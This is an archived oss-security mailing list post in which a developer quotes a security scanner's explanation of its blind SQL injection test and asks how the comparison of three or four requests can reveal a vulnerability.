Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 1 Jun 2016 14:15:41 +0300
From: Mihamina RAKOTOMANDIMBY <mihamina-rakotomandimby@...mb.org>
To: oss-security@...ts.openwall.com
Subject: "The Blind SQL Injection Issue" explanation

Hi members,

A web application of mine has been scanned by a "security tool".
It reports some issues about "Blind SQL Injection Issue"

The test result seems to indicate a vulnerability
because it shows that values can be appended to parameter
values, indicating that they were embedded in an SQL
query. In this test, three (or sometimes four)
requests are sent. The last is logically equal to the original,
and the next-to-last is different. Any others are for control
purposes. A comparison of the last two responses with the first
(the last is similar to it, and the next-to-last is different)
indicates that the application is vulnerable.

This message is widely used on internet: https://goo.gl/Gtqkbk

My problem is I cannot figure out how this could work.

Let's suppose the web app is vulnerable, the reasoning of this test is:

- req. 1 gets resp. 1 and changed database state to state 1
- req. 2 gets resp. 2 and changed database state to state "whatever"
- req. 3 gets resp. 1 and changed database state to state "whatever"

My questions are:
- How could database state "whatever" would give the same response as
  "state 1" ? (a.k.a "resp. 1")
- As a "blind" one (mostly random input then), how could these
  assertions work?

Would you please help me to figure out how this works?
I have basic security level and maths are far away in the past ;-)

Thank you in advance.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.